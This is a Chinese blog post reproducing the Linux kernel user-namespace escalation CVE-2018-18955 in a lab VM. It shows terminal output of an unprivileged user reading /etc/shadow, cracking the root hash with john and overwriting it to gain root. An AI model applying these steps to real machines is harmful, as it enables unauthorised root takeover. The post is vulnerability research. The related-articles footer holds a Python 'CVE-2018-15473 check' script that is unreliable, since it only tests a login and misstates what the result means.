CVE-2018-18955user_name_space空间越权漏洞

最新推荐文章于 2023-11-01 10:23:38 发布
最新推荐文章于 2023-11-01 10:23:38 发布
阅读量1.1k 收藏
点赞数
分类专栏: linux 漏洞溢出 docker及容器技术
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bme314/article/details/105631793
版权

https://www.exploit-db.com/exploits/45886

漏洞原理

大概是在用户命名空间中NS1创建root用户,然后创建嵌套命名空间NS2。
在NS2中映射大于5个id

两个原因造成越权。
1.sort_idmaps会复制forward map的映射队列到reverse map中。4.15-4.19之间的某些内核代码。会在sort_idmaps排序之后进行内核id和用户id的转换。但是只转换了forward map 。 reverse map 没有变化。
2. from_kuid在查询id的过程中,会寻找map->reverse的map映射关系。如果,uid_gid_extent中first成员等于lower_first。那么返回的id将会是原本传进来的id. 没有修改的reverse map 中的值还是用户态传递来的0 到0 的映射,所以发生了越权。

nobody@lier-virtual-machine:~/work/exploit/45886/45886$ id
uid=65534(nobody) gid=65534(nogroup)=65534(nogroup),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(libvirtd)
nobody@lier-virtual-machine:~/work/exploit/45886/45886$ head -n1 /etc/shadow
root:$6$doAc1Cla$O3pPRDFioQj3DKOMr/6djJFI63WZ7KnEpxvC8JWaKLcrPV30RPWfFMwuDdeH/Gn0wuZ/gS9qsqtemBF8Ry6Yf1:18180:0:99999:7:::
nobody@lier-virtual-machine:~/work/exploit/45886/45886$ id
uid=65534(nobody) gid=65534(nogroup)=65534(nogroup),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(libvirtd)

理论上密码只要不强,可以通过工具碰撞出root账户的密码。其实获得的账号的权限并不完整,没有完全的root权限。

我用john工具试了下

n-1.9.0/run$ ./john password.txt
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
bme314           (root)
1g 0:00:00:15 100% 2/3 0.06578g/s 426.9p/s 426.9c/s 426.9C/s !@#$%..andrew
Use the "--show" option to display all of the cracked passwords reliably
Session completed


/run$ cat john.pot 
$6$doAc1Cla$O3pPRDFioQj3DKOMr/6djJFI63WZ7KnEpxvC8JWaKLcrPV30RPWfFMwuDdeH/Gn0wuZ/gS9qsqtemBF8Ry6Yf1:xxxxxx
run$

跑是跑出来了,不过一般情况下需要一个强大的字典,不然没啥用。

突然想到另一种利用方式,这里可能有写 /etc/shawdom的权限,试了下,果然可以。
原来的密码hash

45886$ sudo cat /etc/shadow
root:$6$Qk2IaudC$3Aj3MJ0s22dfxc4cXMI6AOGhXa639.flIwZNXITnqbQSiZ6B9Dc6LWIFB3f3Pd6EUvW/CBMyGzDjGgtHfPMCB1:18372:0:99999:7:::

nest ns

nobody@lier-virtual-machine:~/work/exploit/45886/45886$ vim /etc/shadow
root:$6$vbeZpmCt$4AO8Tg2HRZEYI3aZKuyi4qjVoZwCZ5HsBPPd1/B.ykxnBG3el1JladH1/KMPJjd.dwCK6y7bD8hVCENGXCQJg1:18372:0:99999:7:::

返回普通用户

lier@lier-virtual-machine:~/work/exploit/45886/45886$ sudo cat /etc/shadow
root:$6$vbeZpmCt$4AO8Tg2HRZEYI3aZKuyi4qjVoZwCZ5HsBPPd1/B.ykxnBG3el1JladH1/KMPJjd.dwCK6y7bD8hVCENGXCQJg1:18372:0:99999:7:::
daemon:*:16911:0:99999:7:::
bin:*:16911:0:99999:7:::
sys:*:16911:0:99999:7:::
sync:*:16911:0:99999:7:::

可以看到修改成功。
su root
切换用户,发现只要知道对应的密码,我们可以任意修改root用户的密码。成功执行root账号切换。

root@lier-virtual-machine:/home/lier/work/exploit/45886/45886#

关于user namespace

在这里插入图片描述
从整个漏洞的过程,我们可以猜测到整个user namespce权限管理过程。
嵌套名字空间,由于逆向追溯的过程和查询过程出现的缺陷,造成了权限突破。
我们清楚的看到uns通过vfs, 映射父进程uid到子uns的过程。并且对于文件权限的查询,是通过映射过程的逆过程反向查父usn的相应uid。对于理解user namespace帮助很大。

其实这里映射了很大的docker漏洞,因为dockers利用的就是user namespace. 如果我们在内核为4.15–4.19的中使用docker, 那么很可能通过嵌套构造user namespace直接进行权限提升。不过因为其他namespace空间的限制,不一定会有很大的作用。

补丁:
把追溯id的逻辑放在了复制排序前,这样forward和reverse就都经过了id追溯,可以找到正确的父命名空间id。

参考:
https://www.freebuf.com/vuls/197122.html
https://www.cnblogs.com/likaiming/p/10816529.html

inquisiter
关注
专栏目录
cve2018 linux内核提权漏洞,CVE-2018-18955:较新Linux内核的提权神洞分析
weixin_36389909的博客
05-09 562
原标题:CVE-2018-18955:较新Linux内核的提权神洞分析*本文作者:0x4d69,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。鉴于目前还没有针对这个漏洞的详细分析,原作者的advisory对新手来说也很不友好,我就写了这篇文章。相关知识 user namespace假设你使用Linux,man user_namespaces 就可以给你一个很详细的介绍。如果你还不知道na...
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
CVE-2018-18955漏洞学习
weixin_30847939的博客
05-08 571
简介 这是名称空间漏洞,文章先介绍user namespaces的简单只是,然后从补丁入手,分析源码,找到漏洞出现的原因。因为对这块的源码不是那么熟悉,所以着重描述源码分析的部分,其他可以参考末尾的链接 本文出现的代码都基于linux-4.15.4 namespace linux中有实现名称空间,用来隔离不同的资源,实现原理就是将原本是全局的变量放到各个namespaces之中...
近期Linux漏洞,CVE-2018-18955
weixin_36427002的博客
05-16 404
commit 6397fac4915a ("userns: bump idmap limits to 340") increases the number ofpossible uid/gid mappings that a namespace can have from 5 to 340. This isimplemented by switching to a different data s...
【kernel exploit】CVE-2018-18955 用户命名空间逻辑错误
panhewu9919的博客
07-09 993
影响版本:Linux 4.15.x~4.19.2 4.19.2已修补,4.19.1未修补。 7.0分。 测试版本:Linux-4.19.1 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory 编译选项:CONFIG_USER_NS CONFIG_SLAB=y General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SL
CVE-2018-8120-exp.zip_C++_CVE-2018-8120_cve_漏洞利用
09-23
**CVE-2018-8120详解:Windows LSA权限提升漏洞** CVE-2018-8120是一个针对Windows操作系统的安全漏洞,它属于本地权限提升(Local Security Authority Subsystem Service, LSA)漏洞类型。这个漏洞主要影响Windows...
CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999
09-20
标题中的"CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999"提及了几个关键概念,首先,CVE(Common Vulnerabilities and Exposures)是用于识别网络安全漏洞的标准化系统。"CVE-2018-9995"指的是...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
CouchDB垂直越权漏洞CVE-2017-12635)
小小猪的博客
12-27 766
CouchDB垂直越权漏洞CVE-2017-12635) 框架介绍: Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序) 环境搭建: 采用在线环境 地址 漏洞分析: 主要关注改包的过
Apache Shiro 越权访问漏洞 CVE-2020-1957 漏洞复现
最新发布
qq_44484541的博客
11-01 447
CVE-2020-1957,Spring Boot中使用 Apache Shiro 进行身份验证、权限控制时,可以精心构造恶意的URL,利用 Apache Shiro 和 Spring Boot 对URL的处理的差异化,可以绕过 Apache Shiro 对 Spring Boot 中的 Servlet 的权限控制,越权并实现未授权访问。/admin/ , 最终请求 /admin/, 成功访问了后台请求。构造恶意请求url:http://ip:port/xxx/…/admin/,访问到管理页面,越权成功。
cve2018 linux内核提权漏洞,CVE-2019-13272 Linux 内核提权 +cve-2018-18955
weixin_39652810的博客
05-09 168
Ubuntu 16.04.5 kernel 4.15.0-29-genericUbuntu 18.04.1 kernel 4.15.0-20-genericUbuntu 19.04 kernel 5.0.0-15-genericUbuntu Mate 18.04.2 kernel 4.18.0-15-genericLinux Mint 19 kernel 4.15.0-20-genericXubu...
linux内核提权,CVE-2018-18955:较新Linux内核的提权神洞分析
weixin_39989033的博客
04-29 109
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。*本文作者:0x4d69,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。鉴于目前还没有针对这个漏洞的详细分析,原作者的advisory对新手来说也很不友好,我就写了这篇文章。相关知识user namespace假设你使用Linux,man user_namespaces 就...
越权 漏洞
不秃头的程序Yang
07-17 2157
代码】越权漏洞
越权漏洞
heihei
08-20 6661
讲讲越权那些事 简要 越权漏洞是比较常见的漏洞类型,越权漏洞可以理解为,一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽,对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,可以导致用户A可以操作其他人的信息。​如何发现越权 为了不影
cve-2018-15473的漏洞验证脚本
07-27
您好!以下是一个用于验证CVE-2018-15473漏洞的简单脚本示例: ```python import paramiko def check_vulnerability(host, port, username, password): try: client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(host, port=port, username=username, password=password) print("漏洞 CVE-2018-15473 未被修复") client.close() except paramiko.AuthenticationException: print("漏洞 CVE-2018-15473 已被修复") except Exception as e: print("发生异常:", str(e)) # 使用示例 host = "目标主机IP" port = 22 # SSH端口,默认为22 username = "登录用户名" password = "登录密码" check_vulnerability(host, port, username, password) ``` 请确保安装了paramiko库(可以使用`pip install paramiko`进行安装),并将脚本中的目标主机IP、登录用户名和登录密码替换为实际值。 这个脚本尝试使用paramiko库连接到目标主机,如果成功连接,则说明漏洞CVE-2018-15473仍然存在;如果出现`AuthenticationException`异常,则说明漏洞已经被修复。对于其他异常情况,可以根据实际需要进行处理。 请注意,漏洞验证脚本仅供参考,并不能保证完全准确和全面,建议在合法授权和测试范围内使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值